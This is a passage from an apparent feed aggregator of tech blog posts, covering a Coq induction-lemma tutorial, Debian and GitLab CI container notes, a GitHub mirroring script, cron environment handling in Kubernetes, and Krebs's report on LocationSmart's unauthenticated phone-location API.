  pose proof Hs as H3. eapply proj1 in H3. eapply proj2 in Hs.
  rename Hs into H4.

we now have this goal state:

1 subgoal
a : Type
P : nat -> Bag a -> Bag a -> Prop
H4 : ?Goal2
H1 : ?Goal
H2 : ?Goal0
H3 : ?Goal1
______________________________________(1/1)
forall (n : nat) (b : Bag a), P n b (take n b)

At this point, we start reproducing the proof of length_take: The same approach to induction, the same case splits:

  fix IH 2.
  intros.
  rewrite take_equation.
  destruct (Nat.eqb_spec n 0).
  + subst n.
    revert b.
    refine H1.
  + rename n0 into Hnot_null.
    destruct b.
    * revert n Hnot_null.
      refine H2.
    * rename a0 into x.
      revert x n Hnot_null.
      refine H3.
    * assert (IHb1 : P n b1 (take n b1)) by apply IH.
      assert (IHb2 : P (n - length b1) b2 (take (n - length b1) b2)) by apply IH.
      revert n b1 b2 Hnot_null IHb1 IHb2.
      refine H4.
Defined. (* Important *)

Inside each case, we move all relevant hypotheses into the goal using revert and refine with the corresponding assumption, thus instantiating it. In the recursive case (Two), we assert that P holds for the subterms, by induction.

It is important to end this proof with Defined, and not Qed, as we will see later.

In a next step, we can remove the sigma type:

Definition take_ind' a P := proj2_sig (take_ind_aux a P).

The type of take_ind' is as follows:

take_ind'
     : forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
       proj1_sig (take_ind_aux a P) ->
       forall n b, P n b (take n b)

This looks almost like an induction lemma. The assumptions of this lemma have the not very helpful type proj1_sig (take_ind_aux a P), but we can already use this to prove length_take:

Theorem length_take:
  forall {a} n (b : Bag a),
  length (take n b) = min n (length b).
Proof.
  intros a.
  intros.
  apply take_ind' with (P := fun n b r => length r = min n (length b)).
  repeat apply conj; intros.
  * rewrite Nat.min_0_l. reflexivity.
  * rewrite Nat.min_0_r. reflexivity.
  * simpl. lia.
  * simpl. rewrite length_two, IHb1, IHb2. lia.
Qed.

In this case I have to explicitly state P where I invoke take_ind', because Coq cannot figure out this instantiation on its own (it requires higher-order unification, which is undecidable and unpredictable). In other cases I had more luck.

After I apply take_ind', I have this proof goal:

______________________________________(1/1)
proj1_sig (take_ind_aux a (fun n b r => length r = min n (length b)))

which is the type that Coq inferred for Hs above. We know that this is a conjunction of a bunch of assumptions, and we can split it as such, using repeat apply conj. At this point, Coq needs to look inside take_ind_aux; this would fail if we used Qed to conclude the proof of take_ind_aux.

This gives me four goals, one for each case of take, and the remaining proof really only deals with the specifics of length_take – no more worrying about getting the induction right or doing the case-splitting the right way.

Also note that, very conveniently, Coq uses the same name for the induction hypotheses IHb1 and IHb2 that we used in take_ind_aux!

Making it prettier

It may be a bit confusing to have this proj1_sig in the type, especially when working in a team where others will use your induction lemma without knowing its internals. But we can resolve that, and also turn the conjunctions into normal arrows, using a bit of tactic support. This is completely generic, so if you follow this procedure, you can just copy most of that:

Lemma uncurry_and: forall {A B C}, (A /\ B -> C) -> (A -> B -> C).
Proof. intros. intuition. Qed.
Lemma under_imp:   forall {A B C}, (B -> C) -> (A -> B) -> (A -> C).
Proof. intros. intuition. Qed.
Ltac iterate n f x := lazymatch n with
  | 0 => x
  | S ?n => iterate n f uconstr:(f x)
end.
Ltac uncurryN n x :=
  let n' := eval compute in n in
  lazymatch n' with
  | 0 => x
  | S ?n => let uc := iterate n uconstr:(under_imp) uconstr:(uncurry_and) in
            let x' := uncurryN n x in
            uconstr:(uc x')
end.

With this in place, we can define our final proof scheme lemma:

Definition take_ind'' a P
  := ltac:(let x := uncurryN 3 (proj2_sig (take_ind_aux a P)) in exact x).
Opaque take_ind''.

The type of take_ind'' is now exactly what we’d wish for: all assumptions spelled out, and the n =? 0 case already taken care of (compare this to the take_ind provided by the Function command above):

take_ind''
     : forall (a : Type) (P : nat -> Bag a -> Bag a -> Prop),
       (forall b : Bag a, P 0 b Empty) ->
       (forall n : nat, n <> 0 -> P n Empty Empty) ->
       (forall (x : a) (n : nat), n <> 0 -> P n (Unit x) (Unit x)) ->
       (forall (n : nat) (b1 b2 : Bag a),
        n <> 0 ->
        P n b1 (take n b1) ->
        P (n - length b1) b2 (take (n - length b1) b2) ->
        P n (Two b1 b2) (two (take n b1) (take (n - length b1) b2))) ->
       forall (n : nat) (b : Bag a), P n b (take n b)

At this point we can mark take_ind'' as Opaque, to hide how we obtained this lemma.

Our proof does not change a lot; we merely no longer have to use repeat apply conj:

Theorem length_take''':
  forall {a} n (b : Bag a),
  length (take n b) = min n (length b).
Proof.
  intros a.
  intros.
  apply take_ind'' with (P := fun n b r => length r = min n (length b)); intros.
  * rewrite Nat.min_0_l. reflexivity.
  * rewrite Nat.min_0_r. reflexivity.
  * simpl. lia.
  * simpl. rewrite length_two, IHb1, IHb2. lia.
Qed.

Is it worth it?

It was in my case: applying this trick in our ongoing work of verifying parts of the Haskell compiler GHC separated a somewhat involved proof into a re-usable proof scheme (go_ind), making the actual proofs (go_all_WellScopedFloats, go_res_WellScoped) much neater and more to the point. It saved “only” 60 lines (if I don’t count the 20 “generic” lines above), but the pay-off will increase as I do even more proofs about this function.

Cryptogram - Maliciously Changing Someone's Address

Someone changed the address of UPS corporate headquarters to his own apartment in Chicago. The company discovered it three months later.

The problem, of course, is that in the US there isn't any authentication of change-of-address submissions:

According to the Postal Service, nearly 37 million change-of-address requests - known as PS Form 3575 - were submitted in 2017. The form, which can be filled out in person or online, includes a warning below the signature line that "anyone submitting false or inaccurate information" could be subject to fines and imprisonment.

To cut down on possible fraud, post offices send a validation letter to both an old and new address when a change is filed. The letter includes a toll-free number to call to report anything suspicious.

Each year, only a tiny fraction of the requests are ever referred to postal inspectors for investigation. A spokeswoman for the U.S. Postal Inspection Service could not provide a specific number to the Tribune, but officials have previously said that the number of change-of-address investigations in a given year totals 1,000 or fewer typically.

While fraud involving change-of-address forms has long been linked to identity thieves, the targets are usually unsuspecting individuals, not massive corporations.

Worse Than Failure - Error'd: Perfectly Technical Difficulties

David G. wrote, "For once, I'm glad to see technical issues being presented in a technical way."

 

"Springer has a very interesting pricing algorithm for downloading their books: buy the whole book at some 10% of the sum of all its individual chapters," writes Bernie T.

 

"While browsing PlataGO! forums, I noticed the developers are erasing technical debt...and then some," Dariusz J. writes.

 

Bill K. wrote, "Hooray! It's an 'opposite sale' on Adidas' website!"

 

"A trail camera disguised at a salad bowl? Leave that at an all you can eat buffet and it'll blend right in," wrote Paul T.

 

Brian writes, "Amazon! That's not how you do math!"

 


Planet Debian - Martín Ferrari: MiniDebConf Hamburg - Thursday

MiniDebCamp Hamburg - Thursday 17/5

I missed my flight on Wednesday, and for a moment I thought I would have to cancel my attendance, but luckily I was able to buy a ticket for Thursday for a good price.

I arrived at the venue just in time for a "stand-up" meeting, where people introduced themselves and shared what they are working on or planning to work on. That gave me a great feeling: having an idea of what other people are doing gave me motivation to work on my own projects.

The venue seems to be some kind of cooperative, with office space for different associations; there is also a small guest house (where I am sleeping) and a "cantina". The building seems very pretty, but it is going through some renovations, so the scaffolding does not let you see much of it. It also has a big outdoor area, which is always welcome.

I had a good chat about mapping support in IkiWiki, so my rewrite of the OSM plugin might get some users even before it is completely merged!

I also worked for a while on Prometheus packages, I am hoping to finally get a new version of prometheus-alertmanager packaged soon.

I realised I still had some repos in my home directory on alioth, so I moved these away to salsa. In the same vein, I started discussions about migrating my data-collection scripts for contributors.d.o to salsa; this is quite important if we want to keep contributors relevant and useful.
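
For each repository the move boils down to something like this (a sketch; the salsa path is a placeholder for wherever the project now lives):

# point the repository at its new home on salsa and push everything over
git remote set-url origin git@salsa.debian.org:<namespace>/<repo>.git
git push --all origin
git push --tags origin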


Planet Debian - Olivier Berger: Virtualized lab demonstration using a tweaked Labtainers running in a container

I’ve recorded a screencast: Labtainers in docker demonstration (embedded below) demonstrating how I’ve tweaked Labtainers so as to run it inside its own Docker container.

I’m currently very much excited by the Labtainers framework for delivering virtual labs, for instance in the context of MOOCs.

Labtainers is quite interesting as it allows isolating a lab in several containers running in their own dedicated virtual network, which helps distributing a lab without needing to install anything locally.

My tweak makes it possible to run what I called the "master" container, which contains the Labtainers scripts, instead of having to install Labtainers on a Linux host. This should help with installation and distribution of Labtainers, as well as with deploying it on cloud platforms some day soon. In the meantime, the lab containers run with privileges, so it's advised to be careful; running the whole set of containers in a VM may be safer. Maybe Labtainers will evolve in the future to integrate a containerization of its scripts. My patches are pending, but the upstream authors are currently focused on some other priorities.
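
To give an idea of what this looks like in practice, here is a hypothetical invocation of such a "master" container; the image name, the bind mounts and the use of the host Docker socket are my assumptions about the tweak, not upstream Labtainers documentation:

# run the master container, letting it drive the host's Docker daemon
docker run -it --rm \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -v "$HOME/labtainer_xfer:/home/student/labtainer_xfer" \
  labtainers-master bash
# then, inside the container, start a lab as usual, e.g.:
#   start.py telnetlab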

Another interesting property of Labtainers shown in the demo is the auto-grading feature, which uses traces of what the student performed inside the lab environment to evaluate the activities. Here the telnetlab that I've shown is evaluated by looking at text input on the command line or at messages appearing on stdout or in logs: the student launched both telnet and ssh, some failed logins appeared, etc.

However, the demo is a bit confusing, in that I recorded a second lab execution whereas I had previously attempted a first try at the same telnetlab. In Labtainers, traces of execution can accumulate: the student will make a first attempt and restart later, before sending it all to the professor (unless a redo.py is issued). This explains why the grading appears to give a different result than what I performed in the screencast.

Stay tuned for more news about my Labtainers adventures.

P.S. thanks to labtainers authors, and obs-studio folks for the screencast recording tool 🙂

Planet Debian - Louis-Philippe Véronneau: Running systemd in the Gitlab docker runner CI

At the DebConf videoteam, we use ansible to manage our machines. Last fall in Cambridge, we migrated our repositories to salsa.debian.org and I started playing with the Gitlab CI. It's pretty powerful and helped us catch a bunch of errors we had missed.

As it was my first time playing with continuous integration and docker, I had trouble when our playbooks used systemd in one way or another, and I couldn't figure out a way to have systemd run in the Gitlab docker runner.

Fast forward a few months and I lost another day and a half working on this issue. I haven't been able to make it work (my conclusion is that it's not currently possible), but I thought I would share what I learned in the process with others. Who knows, maybe someone will have a solution!

10 steps to failure

I first started by creating a privileged Gitlab docker runner on a machine that is dedicated to running Gitlab CI runners. To run systemd in docker you either need to run privileged docker instances or to run them with the --cap-add=SYS_ADMIN capability.

If you were trying to run a docker container that runs with systemd directly, you would do something like:

$ docker run -it --cap-add SYS_ADMIN -v /sys/fs/cgroup:/sys/fs/cgroup:ro debian-systemd

I tried replicating this behavior with the Gitlab runner by mounting the right volumes in the runner and giving it the right cap permissions.
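
For reference, registering such a runner looks roughly like this (a sketch: the URL and token are placeholders, and the image name and mounted volume simply mirror the plain docker invocation above):

# register a privileged docker runner with the cgroup volume mounted read-only
sudo gitlab-runner register \
  --non-interactive \
  --url https://salsa.debian.org/ \
  --registration-token REDACTED \
  --executor docker \
  --docker-image debian:stable \
  --docker-privileged \
  --docker-volumes "/sys/fs/cgroup:/sys/fs/cgroup:ro"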

The thing is, normally your docker container runs an entrypoint command such as CMD ["/lib/systemd/systemd"]. To run its CI scripts, the Gitlab runner takes that container but replaces the entrypoint command with:

sh -c 'if [ -x /usr/local/bin/bash ]; then\n\texec /usr/local/bin/bash \nelif [ -x /usr/bin/bash ]; then\n\texec /usr/bin/bash \nelif [ -x /bin/bash ]; then\n\texec /bin/bash \nelif [ -x /usr/local/bin/sh ]; then\n\texec /usr/local/bin/sh \nelif [ -x /usr/bin/sh ]; then\n\texec /usr/bin/sh \nelif [ -x /bin/sh ]; then\n\texec /bin/sh \nelse\n\techo shell not found\n\texit 1\nfi\n\n'

That is to say, it tries to run bash.

If you try to run commands that require systemd such as systemctl status, you'll end up with this error message since systemd is not running:

Failed to get D-Bus connection: Operation not permitted

Trying to run systemd manually once the container has been started won't work either, since systemd needs to be PID 1 in order to work (and PID 1 is bash). You end up with this error:

Trying to run as user instance, but the system has not been booted with systemd.

At this point, I came up with a bunch of creative solutions to try to bypass Gitlab's entrypoint takeover. Turns out you can tell the Gitlab runner to override the container's entrypoint with your own. Sadly, the runner then appends its long bash command right after.

For example, if you run a job with this gitlab-ci entry:

image:
  name: debian-systemd
  entrypoint: "/lib/systemd/systemd"
script:
- /usr/local/bin/my-super-script

You will get this entrypoint:

/lib/systemd/systemd sh -c 'if [ -x /usr/local/bin/bash ]; then\n\texec /usr/local/bin/bash \nelif [ -x /usr/bin/bash ]; then\n\texec /usr/bin/bash \nelif [ -x /bin/bash ]; then\n\texec /bin/bash \nelif [ -x /usr/local/bin/sh ]; then\n\texec /usr/local/bin/sh \nelif [ -x /usr/bin/sh ]; then\n\texec /usr/bin/sh \nelif [ -x /bin/sh ]; then\n\texec /bin/sh \nelse\n\techo shell not found\n\texit 1\nfi\n\n'

This obviously fails. I then tried to be clever and use this entrypoint: ["/lib/systemd/systemd", "&&"]. This does not work either, since docker requires the entrypoint to be only one command.

Someone pointed out to me that you could try to use exec /lib/systemd/systemd to replace the PID 1 bash process with systemd, but that also fails with an error telling you the system has not been booted with systemd.

One more level down

Since it seems you can't run systemd in the Gitlab docker runner directly, why not try to run systemd in docker in docker (dind)? dind is used quite a lot in the Gitlab CI to build containers, so we thought it might work.

Sadly, we haven't been able to make this work either. You need to mount volumes in docker to run systemd properly, and it seems docker doesn't like mounting volumes from a docker container that have already been mounted from the docker host... Oof.

If you have been able to run systemd in the Gitlab docker runner, please contact me!

Paths to explore

The only Gitlab runner executor I've used so far is the docker one, since it's what most Gitlab instances run. There is also an LXC executor; I have no experience with it, but it might be possible to run Gitlab CI tests with systemd that way.

Planet DebianLouis-Philippe Véronneau: Join us in Hamburg for the Hamburg Mini-DebConf!

Thanks to Debian, I have the chance to attend the Hamburg Mini-DebConf, taking place in Hamburg from May 16th to May 20th. We are hosted by Dock Europe in the amazing Viktoria Kaserne building.

Viktoria Kaserne

As always, the DebConf videoteam has been hard at work! Our setup is working pretty well and we only have minor fixes to implement before the conference starts.

For those of you who couldn't attend the mini-conf, you can watch the live stream here. Videos will be uploaded shortly after to the DebConf video archive.

Olasd resting on our makeshift cubes podium

Planet Linux AustraliaMichael Still: How to maintain a local mirror of github repositories

Share

Similarly to yesterday’s post about mirroring ONAP’s git, I also want to mirror all of the git repositories for certain github projects. In this specific case, all of the Kubernetes repositories.

So once again, here is a script based on something Tony Breeds and I cooked up a long time ago for OpenStack…

#!/usr/bin/env python

from __future__ import print_function

import datetime
import json
import os
import subprocess
import random
import requests

from github import Github as github


GITHUB_ACCESS_TOKEN = '...use yours!...'


def get_github_projects():
    g = github(GITHUB_ACCESS_TOKEN)
    for user in ['kubernetes']:
        for repo in g.get_user(login=user).get_repos():
            yield('https://github.com', repo.full_name)


def _ensure_path(path):
    if not path:
        return

    full = []
    for elem in path.split('/'):
        full.append(elem)
        if not os.path.exists('/'.join(full)):
            os.makedirs('/'.join(full))


starting_dir = os.getcwd()
projects = []
for res in list(get_github_projects()):
    if len(res) == 3:
        projects.append(res)
    else:
        projects.append((res[0], res[1], res[1]))
    
random.shuffle(projects)

for base_url, project, subdir in projects:
    print('%s Considering %s %s'
          %(datetime.datetime.now(), base_url, project))
    os.chdir(starting_dir)

    if os.path.isdir(subdir):
        os.chdir(subdir)

        print('%s Updating %s'
              %(datetime.datetime.now(), project))
        try:
            subprocess.check_call(
                ['git', 'remote', '-vvv', 'update'])
        except Exception as e:
            print('%s FAILED: %s'
                  %(datetime.datetime.now(), e))
    else:
        git_url = os.path.join(base_url, project)
        _ensure_path('/'.join(subdir.split('/')[:-1]))

        print('%s Cloning %s'
              %(datetime.datetime.now(), project))
        subprocess.check_call(
            ['ionice', '-c', 'idle', 'git', 'clone',
             '-vvv', '--mirror', git_url, subdir])

This script is basically the same as the ONAP one, but it understands how to get a project list from github and doesn’t need to handle ONAP’s slightly strange repository naming scheme.
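
If you want the mirror to refresh itself, a cron entry is enough. This is only a sketch: the script location and the mirror directory are hypothetical and need to match wherever you actually put things.

# refresh the local github mirror every night at 03:00
0 3 * * * cd /srv/mirror/github && /usr/local/bin/github-mirror >> /var/log/github-mirror.log 2>&1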

I hope it is useful to someone other than me.

Share

The post How to maintain a local mirror of github repositories appeared first on Made by Mikal.

Planet DebianNorbert Preining: Docker, cron, environment variables, and Kubernetes

I recently mentioned that I am running cron in some of the docker containers I need for a new service. Now that we have moved to Kubernetes and Rancher for deployment, I moved most of the configuration into Kubernetes ConfigMaps, and expose the key/value pairs there as environment variables. Sounded like a good idea, but …

but well, reading the documentation would have helped. Cron scripts do not see the normal environment of the surrounding process (cron, init, whatever), but get a cleaned-up environment. As a consequence, none of the configuration keys available in the environment showed up in the cron jobs – and as a consequence the jobs failed badly, of course 😉

After some thinking and reading, I came up with two solutions, one “Dirty Harry^WNorby” solution and one clean and nice, but annoying solution.

Dirty Harry^WNorby solution

What is available in the environment of the cron jobs is minimal, and in fact more or less what is defined in /etc/environment and stuff set by the shell (if it is a shell script). So the solution was adding the necessary variable definitions to /etc/environment in a way that they are properly set. For that, I added the following code in the start-syslog-cron script that is the entry point of the container:

# prepare for export of variables to cron jobs
if [ -r /env-vars-to-be-exported ]
then
  for i in `cat /env-vars-to-be-exported`
  do
    echo "$i=${!i}" >> /etc/environment
  done
fi

Meaning, if the container contains a file /env-vars-to-be-exported, then its lines are treated as variable names and are written to /etc/environment with the respective values at the time of invocation.

Using this quick and dirty trick it is now dead easy to get the ConfigMap variables into the cron jobs’ environment by adding the necessary variable names to the file /env-vars-to-be-exported. Thus, no adaptation of the original source code was necessary – a big plus!
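
As an illustration (the variable names here are invented), a container shipping a file like this:

$ cat /env-vars-to-be-exported
DB_HOST
DB_PASSWORD

would end up, after the entry point has run, with lines such as DB_HOST=db.example.internal and DB_PASSWORD=secret appended to /etc/environment, which is exactly the environment cron hands to its jobs.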

Be warned, there is no error checking etc, so one can mess up the container quite easily 😉

Standards solution

The more standard and clean solution is mounting the ConfigMap and reading the values from the exported files. This is possible, and has the big advantage that one can change the values without restarting the containers (mounted ConfigMaps are updated when the ConfigMaps change – besides a few corner cases), and there is no nasty trickery in the initialization.

The disadvantage is that the code of the cron jobs needs to be changed to read the variables from the config files instead of from the environment.
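
As a rough sketch of what that change looks like (the /config mount point and the variable names are made up), a cron script would read the mounted files instead of expanding environment variables:

#!/bin/sh
# values come from the mounted ConfigMap, one file per key
DB_HOST="$(cat /config/DB_HOST)"
DB_PASSWORD="$(cat /config/DB_PASSWORD)"
echo "connecting to ${DB_HOST}"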

,

Krebs on SecurityTracking Firm LocationSmart Leaked Location Data for Customers of All Major U.S. Mobile Carriers Without Consent in Real Time Via Its Web Site

LocationSmart, a U.S. based company that acts as an aggregator of real-time data about the precise location of mobile phone devices, has been leaking this information to anyone via a buggy component of its Web site — without the need for any password or other form of authentication or authorization — KrebsOnSecurity has learned. The company took the vulnerable service offline early this afternoon after being contacted by KrebsOnSecurity, which verified that it could be used to reveal the location of any AT&T, Sprint, T-Mobile or Verizon phone in the United States to an accuracy of within a few hundred yards.

On May 10, The New York Times broke the news that a different cell phone location tracking company called Securus Technologies had been selling or giving away location data on customers of virtually any major mobile network provider to a sheriff’s office in Mississippi County, Mo.

On May 15, ZDnet.com ran a piece saying that Securus was getting its data through an intermediary — Carlsbad, CA-based LocationSmart.

Wednesday afternoon Motherboard published another bombshell: A hacker had broken into the servers of Securus and stolen 2,800 usernames, email addresses, phone numbers and hashed passwords of authorized Securus users. Most of the stolen credentials reportedly belonged to law enforcement officers across the country — stretching from 2011 up to this year.

Several hours before the Motherboard story went live, KrebsOnSecurity heard from Robert Xiao, a security researcher at Carnegie Mellon University who’d read the coverage of Securus and LocationSmart and had been poking around a demo tool that LocationSmart makes available on its Web site for potential customers to try out its mobile location technology.

LocationSmart’s demo is a free service that allows anyone to see the approximate location of their own mobile phone, just by entering their name, email address and phone number into a form on the site. LocationSmart then texts the phone number supplied by the user and requests permission to ping that device’s nearest cellular network tower.

Once that consent is obtained, LocationSmart texts the subscriber their approximate longitude and latitude, plotting the coordinates on a Google Street View map. [It also potentially collects and stores a great deal of technical data about your mobile device. For example, according to their privacy policy that information “may include, but is not limited to, device latitude/longitude, accuracy, heading, speed, and altitude, cell tower, Wi-Fi access point, or IP address information”].

But according to Xiao, a PhD candidate at CMU’s Human-Computer Interaction Institute, this same service failed to perform basic checks to prevent anonymous and unauthorized queries. Translation: Anyone with a modicum of knowledge about how Web sites work could abuse the LocationSmart demo site to figure out how to conduct mobile number location lookups at will, all without ever having to supply a password or other credentials.

“I stumbled upon this almost by accident, and it wasn’t terribly hard to do,” Xiao said. “This is something anyone could discover with minimal effort. And the gist of it is I can track most peoples’ cell phone without their consent.”

Xiao said his tests showed he could reliably query LocationSmart’s service to ping the cell phone tower closest to a subscriber’s mobile device. Xiao said he checked the mobile number of a friend several times over a few minutes while that friend was moving. By pinging the friend’s mobile network multiple times over several minutes, he was then able to plug the coordinates into Google Maps and track the friend’s directional movement.

“This is really creepy stuff,” Xiao said, adding that he’d also successfully tested the vulnerable service against one Telus Mobility mobile customer in Canada who volunteered to be found.

Before LocationSmart’s demo was taken offline today, KrebsOnSecurity pinged five different trusted sources, all of whom gave consent to have Xiao determine the whereabouts of their cell phones. Xiao was able to determine within a few seconds of querying the public LocationSmart service the near-exact location of the mobile phone belonging to all five of my sources.

LocationSmart’s demo page.

One of those sources said the longitude and latitude returned by Xiao’s queries came within 100 yards of their then-current location. Another source said the location found by the researcher was 1.5 miles away from his current location. The remaining three sources said the location returned for their phones was between approximately 1/5 and 1/3 of a mile off at the time.

Reached for comment via phone, LocationSmart Founder and CEO Mario Proietti said the company was investigating.

“We don’t give away data,” Proietti said. “We make it available for legitimate and authorized purposes. It’s based on legitimate and authorized use of location data that only takes place on consent. We take privacy seriously and we’ll review all facts and look into them.”

LocationSmart’s home page features the corporate logos of all four of the major wireless providers, as well as companies like Google, Neustar, ThreatMetrix, and U.S. Cellular. The company says its technologies help businesses keep track of remote employees and corporate assets, and that it helps mobile advertisers and marketers serve consumers with “geo-relevant promotions.”

LocationSmart’s home page lists many partners.

It’s not clear exactly how long LocationSmart has offered its demo service or for how long the service has been so permissive; this link from archive.org suggests it dates back to at least January 2017. This link from The Internet Archive suggests the service may have existed under a different company name — loc-aid.com — since mid-2011, but it’s unclear if that service used the same code. Loc-aid.com is one of four other sites hosted on the same server as locationsmart.com, according to Domaintools.com.

LocationSmart’s privacy policy says the company has security measures in place…”to protect our site from the loss or misuse of information that we have collected. Our servers are protected by firewalls and are physically located in secure data facilities to further increase security. While no computer is 100% safe from outside attacks, we believe that the steps we have taken to protect your personal information drastically reduce the likelihood of security problems to a level appropriate to the type of information involved.”

But these assurances may ring hollow to anyone with a cell phone who’s concerned about having their physical location revealed at any time. The component of LocationSmart’s Web site that can be abused to look up mobile location data at will is an insecure “application programming interface” or API — an interactive feature designed to display data in response to specific queries by Web site visitors.

Although the LocationSmart’s demo page required users to consent to having their phone located by the service, LocationSmart apparently did nothing to prevent or authenticate direct interaction with the API itself.

API authentication weaknesses are not uncommon, but they can lead to the exposure of sensitive data on a great many people in a short period of time. In April 2018, KrebsOnSecurity broke the story of an API at the Web site of fast-casual bakery chain PaneraBread.com that exposed the names, email and physical addresses, birthdays and last four digits of credit cards on file for tens of millions of customers who’d signed up for an account at PaneraBread to order food online.

In a May 9 letter sent to the top four wireless carriers and to the U.S. Federal Communications Commission in the wake of revelations about Securus’ alleged practices, Sen. Ron Wyden (D-Ore.) urged all parties to take “proactive steps to prevent the unrestricted disclosure and potential abuse of private customer data.”

“Securus informed my office that it purchases real-time location information on AT&T’s customers — through a third party location aggregator that has a commercial relationship with the major wireless carriers — and routinely shares that information with its government clients,” Wyden wrote. “This practice skirts wireless carrier’s legal obligation to be the sole conduit by which the government may conduct surveillance of Americans’ phone records, and needlessly exposes millions of Americans to potential abuse and unchecked surveillance by the government.”

Securus, which reportedly gets its cell phone location data from LocationSmart, told The New York Times that it requires customers to upload a legal document — such as a warrant or affidavit — and to certify that the activity was authorized. But in his letter, Wyden said “senior officials from Securus have confirmed to my office that it never checks the legitimacy of those uploaded documents to determine whether they are in fact court orders and has dismissed suggestions that it is obligated to do so.”

Securus did not respond to requests for comment.

THE CARRIERS RESPOND

It remains unclear what, if anything, AT&T, Sprint, T-Mobile and Verizon plan to do about any of this. A third-party firm leaking customer location information not only would almost certainly violate each mobile provider’s own stated privacy policies, but the real-time exposure of this data poses serious privacy and security risks for virtually all U.S. mobile customers (and perhaps beyond, although all my willing subjects were inside the United States).

None of the major carriers would confirm or deny a formal business relationship with LocationSmart, despite LocationSmart listing them each by corporate logo on its Web site.

AT&T spokesperson Jim Greer said AT&T does not permit the sharing of location information without customer consent or a demand from law enforcement.

“If we learn that a vendor does not adhere to our policy we will take appropriate action,” Greer said.

T-Mobile referred me to their privacy policy, which says T-Mobile follows the “best practices” document (PDF) for subscriber location data as laid out by the CTIA, the international association for the wireless telecommunications industry.

A T-Mobile spokesperson said that after receiving Sen. Wyden’s letter, the company quickly shut down any transaction of customer location data to Securus and LocationSmart.

“We take the privacy and security of our customers’ data very seriously,” the company said in a written statement. “We have addressed issues that were identified with Securus and LocationSmart to ensure that such issues were resolved and our customers’ information is protected. We continue to investigate this.”

Verizon also referred me to their privacy policy.

Sprint officials shared the following statement:

“Protecting our customers’ privacy and security is a top priority, and we are transparent about our Privacy Policy. To be clear, we do not share or sell consumers’ sensitive information to third parties. We share personally identifiable geo-location information only with customer consent or in response to a lawful request such as a validated court order from law enforcement.”

“We will answer the questions raised in Sen. Wyden’s letter directly through appropriate channels. However, it is important to note that Sprint’s relationship with Securus does not include data sharing, and is limited to supporting efforts to curb unlawful use of contraband cellphones in correctional facilities.”

WHAT NOW?

Stephanie Lacambra, a staff attorney with the nonprofit Electronic Frontier Foundation, said that wireless customers in the United States cannot opt out of location tracking by their own mobile providers. For starters, carriers constantly use this information to provide more reliable service to their customers. Also, by law wireless companies need to be able to ascertain at any time the approximate location of a customer’s phone in order to comply with emergency 911 regulations.

But unless and until Congress and federal regulators make it more clear how and whether customer location information can be shared with third-parties, mobile device customers may continue to have their location information potentially exposed by a host of third-party companies, Lacambra said.

“This is precisely why we have lobbied so hard for robust privacy protections for location information,” she said. “It really should be only that law enforcement is required to get a warrant for this stuff, and that’s the rule we’ve been trying to push for.”

Chris Calabrese is vice president of the Center for Democracy & Technology, a policy think tank in Washington, D.C. Calabrese said the current rules about mobile subscriber location information are governed by the Electronic Communications Privacy Act (ECPA), a law passed in 1986 that hasn’t been substantially updated since.

“The law here is really out of date,” Calabrese said. “But I think any processes that involve going to third parties who don’t verify that it’s a lawful or law enforcement request — and that don’t make sure the evidence behind that request is legitimate — are hugely problematic and they’re major privacy violations.”

“I would be very surprised if any mobile carrier doesn’t think location information should be treated sensitively, and I’m sure none of them want this information to be made public,” Calabrese continued. “My guess is the carriers are going to come down hard on this, because it’s sort of their worst nightmare come true. We all know that cell phones are portable tracking devices. There’s a sort of an implicit deal where we’re okay with it because we get lots of benefits from it, but we all also assume this information should be protected. But when it isn’t, that presents a major problem and I think these examples would be a spur for some sort of legislative intervention if they weren’t fixed very quickly.”

For his part, Xiao says we’re likely to see more leaks from location tracking companies like Securus and LocationSmart as long as the mobile carriers are providing third party companies any access to customer location information.

“We’re going to continue to see breaches like this happen until access to this data can be much more tightly controlled,” he said.

Sen. Wyden issued a statement on Friday in response to this story:

“This leak, coming only days after the lax security at Securus was exposed, demonstrates how little companies throughout the wireless ecosystem value Americans’ security. It represents a clear and present danger, not just to privacy but to the financial and personal security of every American family. Because they value profits above the privacy and safety of the Americans whose locations they traffic in, the wireless carriers and LocationSmart appear to have allowed nearly any hacker with a basic knowledge of websites to track the location of any American with a cell phone.”

“The threats to Americans’ security are grave – a hacker could have used this site to know when you were in your house so they would know when to rob it. A predator could have tracked your child’s cell phone to know when they were alone. The dangers from LocationSmart and other companies are limitless. If the FCC refuses to act after this revelation then future crimes against Americans will be on the commissioners’ heads.”

 

Sen. Mark Warner (D-Va.) also issued a statement:

“This is one of many developments over the last year indicating that consumers are really in the dark on how their data is being collected and used,” Sen. Warner said. “It’s more evidence that we need 21st century rules that put users in the driver’s seat when it comes to the ways their data is used.”

In a statement provided to KrebsOnSecurity on Friday, LocationSmart said:

“LocationSmart provides an enterprise mobility platform that strives to bring secure operational efficiencies to enterprise customers. All disclosure of location data through LocationSmart’s platform relies on consent first being received from the individual subscriber. The vulnerability of the consent mechanism recently identified by Mr. Robert Xiao, a cybersecurity researcher, on our online demo has been resolved and the demo has been disabled. We have further confirmed that the vulnerability was not exploited prior to May 16th and did not result in any customer information being obtained without their permission.”

“On that day as many as two dozen subscribers were located by Mr. Xiao through his exploitation of the vulnerability. Based on Mr. Xiao’s public statements, we understand that those subscribers were located only after Mr. Xiao personally obtained their consent. LocationSmart is continuing its efforts to verify that not a single subscriber’s location was accessed without their consent and that no other vulnerabilities exist. LocationSmart is committed to continuous improvement of its information privacy and security measures and is incorporating what it has learned from this incident into that process.”

It’s not clear who LocationSmart considers “customers” in the phrase, “did not result in any customer information being obtained without their permission,” since anyone whose location was looked up through abuse of the service’s buggy API could not fairly be considered a “customer.”

Update, May 18, 11:31 AM ET: Added comments from Sens. Wyden and Warner, as well as updated statements from LocationSmart and T-Mobile.

Sociological Images“I Felt Like Destroying Something Beautiful”

When I was eight, my brother and I built a card house. He was obsessed with collecting baseball cards and had amassed thousands, taking up nearly every available corner of his childhood bedroom. After watching a particularly gripping episode of The Brady Bunch, in which Marsha and Greg settled a dispute by building a card house, we decided to stack the cards in our favor and build. Forty-eight hours later a seven-foot monstrosity emerged…and it was glorious.

I told this story to a group of friends as I ran a stack of paper coasters through my fingers. We were attending Oktoberfest 2017 in a rural university town in the Midwest. They collectively decided I should flex my childhood skills and construct a coaster card house. Supplies were in abundance and time was no constraint. 

